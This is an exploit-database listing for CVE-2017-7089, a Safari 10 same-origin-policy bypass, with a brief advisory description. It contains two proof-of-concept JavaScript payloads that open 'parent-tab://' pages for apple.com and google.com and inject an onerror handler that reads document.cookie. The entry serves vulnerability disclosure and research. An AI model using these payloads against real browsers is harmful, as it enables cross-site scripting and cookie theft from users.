Lucene search

K
zdtBo0oM1337DAY-ID-28744
HistoryOct 05, 2017 - 12:00 a.m.

Safari 10 Local SOP bypass Vulnerability

2017-10-0500:00:00
Bo0oM
0day.today
66

EPSS

0.006

Percentile

79.5%

Exploit for macOS platform in category local exploits

Safari 10 Local SOP bypass Vulnerability

CVE-2017-7089

Impact: Processing maliciously crafted web content may lead to universal cross site scripting

Description: A logic issue existed in the handling of the parent-tab. This issue was addressed with improved state management.
Safari 10
Local SOP bypass

<script> function Pew(){var doc=open('parent-tab://apple.com');doc.document.body.innerHTML='<img src=q onerror=alert(document.cookie)>';}</script><button onclick=Pew();>Click me!</button>

Exploit by Frans RosΓ©n

data:text/html,<script>function y(){x=open('parent-tab://google.com','_top'),x.document.body.innerHTML='<img/src=""onerror="alert(document.cookie)">'};setTimeout(y,100)</script>

#  0day.today [2018-04-14]  #